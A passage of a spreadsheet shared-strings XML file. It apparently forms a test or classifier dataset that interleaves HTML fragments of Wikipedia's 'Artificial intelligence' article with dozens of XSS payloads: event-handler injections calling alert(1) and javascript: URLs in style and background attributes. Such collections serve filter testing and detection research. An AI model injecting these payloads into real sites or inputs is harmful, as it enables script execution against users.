  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Output your scraped data using different formats and storages.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=A+Proposal+for+the+Dartmouth+Summer+Research+Project+on+Artificial+Intelligence&amp;amp;rft.date=1955&amp;amp;rft.aulast=McCarthy&amp;amp;rft.aufirst=John&amp;amp;rft.au=Minsky%2C+Marvin&amp;amp;rft.au=Rochester%2C+Nathan&amp;amp;rft.au=Shannon%2C+Claude&amp;amp;rft_id=http%3A%2F%2Fwww-formal.stanford.edu%2Fjmc%2Fhistory%2Fdartmouth%2Fdartmouth.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;del style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;image onkeyup="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Second_AI_winter-12"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Second_AI_winter_12-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Second_AI_winter_12-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Explanatory_power" title="Explanatory power"&gt;Explanatory power &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.voanews.com/episode/ethical-ai-learns-human-rights-framework-4087171"&gt;"Ethical AI Learns Human Rights Framework" &lt;/a&gt;. &lt;i&gt;Voice of America &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;10 November </t>
  </si>
  <si>
    <t>&lt;textarea onkeydown="alert(1)" contenteditable&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;bdo id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;div id="p-cactions" role="navigation" class="vectorMenu emptyPortlet" aria-labelledby="p-cactions-label"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_realism" title="Scientific realism"&gt;Scientific realism &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Anti-realism" title="Anti-realism"&gt;Anti-realism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointerup=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;element onclick="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Autonomous_weapons"&gt;Autonomous weapons </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tbody style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;address id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;meter onkeypress="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/cs.CL"&gt;cs.CL &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Exploring+the+Limits+of+Language+Modeling&amp;amp;rft.date=2016&amp;amp;rft_id=info%3Aarxiv%2F1602.02410&amp;amp;rft.aulast=Jozefowicz&amp;amp;rft.aufirst=Rafal&amp;amp;rft.au=Vinyals%2C+Oriol&amp;amp;rft.au=Schuster%2C+Mike&amp;amp;rft.au=Shazeer%2C+Noam&amp;amp;rft.au=Wu%2C+Yonghui&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;ul&gt;&lt;li id="coll-create_a_book"&gt;&lt;a href="/w/index.php?title=Special:Book&amp;amp;bookcmd=book_creator&amp;amp;referer=Artificial+intelligence"&gt;Create a book &lt;/a&gt; &lt;/li&gt;&lt;li id="coll-download-as-rl"&gt;&lt;a href="/w/index.php?title=Special:ElectronPdf&amp;amp;page=Artificial+intelligence&amp;amp;action=show-download-screen"&gt;Download as PDF &lt;/a&gt; &lt;/li&gt;&lt;li id="t-print"&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;printable=yes" title="Printable version of this page [p]" accesskey="p"&gt;Printable version &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;figcaption ondrop=alert(1) contenteditable&gt;drop here&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Ambient_intelligence" title="Ambient intelligence"&gt;Ambient intelligence &lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Artificial intelligence is assisting doctors. According to Bloomberg Technology, Microsoft has developed AI to help doctors find the right treatments for cancer.&lt;sup id="cite_ref-301" class="reference"&gt;&lt;a href="#cite_note-301"&gt;&amp;#91;290&amp;#93; &lt;/a&gt; &lt;/sup&gt; There is a great amount of research and drugs developed relating to cancer. In detail, there are more than 800 medicines and vaccines to treat cancer. This negatively affects the doctors, because there are too many options to choose from, making it more difficult to choose the right drugs for the patients. Microsoft is working on a project to develop a machine called "Hanover"&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a rel="nofollow" class="external text" href="https://www.academia.edu/2475776/Versatile_question_answering_systems_seeing_in_synthesis"&gt;"Versatile question answering systems: seeing in synthesis" &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160201125047/http://www.academia.edu/2475776/Versatile_question_answering_systems_seeing_in_synthesis"&gt;Archived &lt;/a&gt; 1 February 2016 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt;, Mittal et al., IJIIDS, 5(2), 119–142, 2011 </t>
  </si>
  <si>
    <t>&lt;sup id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/sup&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-400"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-400"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;cite onbeforecopy="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-68"&gt;&lt;a href="#Economics"&gt;&lt;span class="tocnumber"&gt;9 </t>
  </si>
  <si>
    <t>&lt;link rel="apple-touch-icon" href="/static/apple-touch/wikipedia.png"/&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robotic_paradigm" title="Robotic paradigm"&gt;Paradigms &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-224"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-224"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFHenderson2007"&gt;Henderson 2007 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;xmp draggable="true" ondragend="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;applet onload=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;details onpointerleave=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onblur=alert(1) tabindex=1 id=x&gt;&lt;/plaintext&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;According to &lt;a href="/wiki/CNN" title="CNN"&gt;CNN &lt;/a&gt;, a recent study by surgeons at the Children's National Medical Center in Washington successfully demonstrated surgery with an autonomous robot. The team supervised the robot while it performed soft-tissue surgery, stitching together a pig's bowel during open surgery, and doing so better than a human surgeon, the team claimed.&lt;sup id="cite_ref-305" class="reference"&gt;&lt;a href="#cite_note-305"&gt;&amp;#91;294&amp;#93; &lt;/a&gt; &lt;/sup&gt; IBM has created its own artificial intelligence computer, the &lt;a href="/wiki/IBM_Watson" class="mw-redirect" title="IBM Watson"&gt;IBM Watson &lt;/a&gt;, which has beaten human intelligence (at some levels). Watson has struggled to achieve success and adoption in healthcare.&lt;sup id="cite_ref-306" class="reference"&gt;&lt;a href="#cite_note-306"&gt;&amp;#91;295&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpageshow=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;th onpointerdown=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;body onkeydown="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;html id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLenatGuha1989"&gt;Lenat &amp;amp; Guha 1989 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;rt onload=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;noframes id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/noframes&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://google:ha.ckers.org"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;bdi id=x tabindex=1 onactivate=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpointerleave=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onkeyup="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;strong onbeforecut="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;caption id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;rtc ondblclick="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;rt draggable="true" ondrag="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=6" title="Edit section: Knowledge representation"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-316"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-316"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;strike draggable="true" ondragleave="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;aside onpointerover=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;basefont id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;Gödel 1931, Church 1936, Kleene 1935, Turing 1937 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;td style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFNewellSimon1976"&gt;Newell &amp;amp; Simon 1976 &lt;/a&gt;, p.&amp;#160;116 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;address style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;picture onpointerdown=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;bdi id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;object draggable="true" ondragend="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;mark draggable="true" ondragend="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;time onmouseout="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/16622160"&gt;16622160 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Journal+of+the+American+Medical+Informatics+Association&amp;amp;rft.atitle=Using+Commercial+Knowledge+Bases+for+Clinical+Decision+Support%3A+Opportunities%2C+Hurdles%2C+and+Recommendations&amp;amp;rft.volume=13&amp;amp;rft.issue=4&amp;amp;rft.pages=369-371&amp;amp;rft.date=2006-07-01&amp;amp;rft_id=%2F%2Fwww.ncbi.nlm.nih.gov%2Fpmc%2Farticles%2FPMC1513681&amp;amp;rft_id=info%3Apmid%2F16622160&amp;amp;rft_id=info%3Adoi%2F10.1197%2Fjamia.M2055&amp;amp;rft.aulast=Kuperman&amp;amp;rft.aufirst=G.+J.&amp;amp;rft.au=Reichley%2C+R.+M.&amp;amp;rft.au=Bailey%2C+T.+C.&amp;amp;rft_id=%2F%2Fwww.ncbi.nlm.nih.gov%2Fpmc%2Farticles%2FPMC1513681&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;q onpaste="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;rtc draggable="true" ondragstart="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;param oncontextmenu="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Biorobotics" title="Biorobotics"&gt;Biorobotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;q oncontextmenu="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;image3 onpointerup=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;listing onload=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;base oncopy="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert('')")}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;caption oncut="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;data onmousedown="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;input2 onpointermove=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-252"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-252"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;p&gt;In &lt;a href="/wiki/Computer_science" title="Computer science"&gt;computer science &lt;/a&gt;, &lt;b&gt;artificial intelligence &lt;/b&gt; (&lt;b&gt;AI &lt;/b&gt;), sometimes called &lt;b&gt;machine intelligence &lt;/b&gt;, is &lt;a href="/wiki/Intelligence" title="Intelligence"&gt;intelligence &lt;/a&gt; demonstrated by &lt;a href="/wiki/Machine" title="Machine"&gt;machines &lt;/a&gt;, in contrast to the &lt;b&gt;natural intelligence &lt;/b&gt; displayed by &lt;a href="/wiki/Human_intelligence" title="Human intelligence"&gt;humans &lt;/a&gt; and &lt;a href="/wiki/Animal_cognition" title="Animal cognition"&gt;animals &lt;/a&gt;. Leading AI textbooks define the field as the study of "&lt;a href="/wiki/Intelligent_agent" title="Intelligent agent"&gt;intelligent agents &lt;/a&gt;": any device that perceives its environment and takes actions that maximize its chance of successfully achieving its goals.&lt;sup id="cite_ref-Definition_of_AI_1-0" class="reference"&gt;&lt;a href="#cite_note-Definition_of_AI-1"&gt;&amp;#91;1&amp;#93; &lt;/a&gt; &lt;/sup&gt; Colloquially, the term "artificial intelligence" is often used to describe machines (or computers) that mimic "cognitive" functions that humans associate with the &lt;a href="/wiki/Human_mind" class="mw-redirect" title="Human mind"&gt;human mind &lt;/a&gt;, such as "learning" and "problem solving".&lt;sup id="cite_ref-FOOTNOTERussellNorvig20092_2-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig20092-2"&gt;&amp;#91;2&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;caption id=x tabindex=1 onfocus=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;track onkeypress="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.infosys.com/industries/travel-hospitality/documents/ai-travel-hospitality.pdf"&gt;"Role of AI in travel and Hospitality Industry" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://fortune.com/ai-artificial-intelligence-deep-machine-learning/"&gt;"Why Deep Learning Is Suddenly Changing Your Life" &lt;/a&gt;. &lt;i&gt;Fortune &lt;/i&gt;. 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;12 March </t>
  </si>
  <si>
    <t>&lt;bdi draggable="true" ondragenter="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onbeforecut="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Existential_risk_from_artificial_intelligence" title="Template:Existential risk from artificial intelligence"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Existential_risk_from_artificial_intelligence" title="Template talk:Existential risk from artificial intelligence"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Existential_risk_from_artificial_intelligence&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;h1 id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/h1&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;hgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;section onpointerleave=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;address onpaste="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;li draggable="true" ondragstart="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;section onmouseup="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpaste="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;footer draggable="true" ondragleave="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;button oncontextmenu="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;dl oncopy="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;figure ondblclick="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;957 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKumarKumar2012" class="citation journal"&gt;Kumar, Gulshan; Kumar, Krishan (2012). "The Use of Artificial-Intelligence-Based Ensembles for Intrusion Detection: A Review". &lt;i&gt;Applied Computational Intelligence and Soft Computing &lt;/i&gt;. &lt;b&gt;2012 &lt;/b&gt;: 1–20. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1155%2F2012%2F850160"&gt;10.1155/2012/850160 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Applied+Computational+Intelligence+and+Soft+Computing&amp;amp;rft.atitle=The+Use+of+Artificial-Intelligence-Based+Ensembles+for+Intrusion+Detection%3A+A+Review&amp;amp;rft.volume=2012&amp;amp;rft.pages=1-20&amp;amp;rft.date=2012&amp;amp;rft_id=info%3Adoi%2F10.1155%2F2012%2F850160&amp;amp;rft.aulast=Kumar&amp;amp;rft.aufirst=Gulshan&amp;amp;rft.au=Kumar%2C+Krishan&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;big ondragover=alert(1) contenteditable&gt;drop here&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-57"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-57"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;listing onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/listing&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Vitalism" title="Vitalism"&gt;Vitalism &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;area id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onclick="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;content ondblclick="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;param id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;main oncut="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpointerup=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;canvas id=x tabindex=1 onactivate=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>Turing's original publication:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;datalist style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;There are three philosophical questions related to AI:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Friendly_artificial_intelligence" title="Friendly artificial intelligence"&gt;Friendly artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Logic </t>
  </si>
  <si>
    <t>&lt;BODY BACKGROUND="javascript:alert('')"&gt;</t>
  </si>
  <si>
    <t>&lt;area onpaste="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Cyc" title="Cyc"&gt;Cyc &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;s ondrop=alert(1) contenteditable&gt;drop here&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;image onbeforecopy="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointerenter=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;nav onkeypress="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-10"&gt;&lt;a href="#Perception"&gt;&lt;span class="tocnumber"&gt;4.6 </t>
  </si>
  <si>
    <t>&lt;fieldset onpointerout=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpaste="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;hr id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;input type="checkbox" class="vectorMenuCheckbox" aria-labelledby="p-cactions-label" /&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;legend id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Kuperman, G. J.; Reichley, R. M.; Bailey, T. C. (1 July 2006). &lt;a rel="nofollow" class="external text" href="//www.ncbi.nlm.nih.gov/pmc/articles/PMC1513681"&gt;"Using Commercial Knowledge Bases for Clinical Decision Support: Opportunities, Hurdles, and Recommendations" &lt;/a&gt;. &lt;i&gt;Journal of the American Medical Informatics Association &lt;/i&gt;. &lt;b&gt;13 &lt;/b&gt; (4): 369–371. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1197%2Fjamia.M2055"&gt;10.1197/jamia.M2055 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Central" title="PubMed Central"&gt;PMC &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" 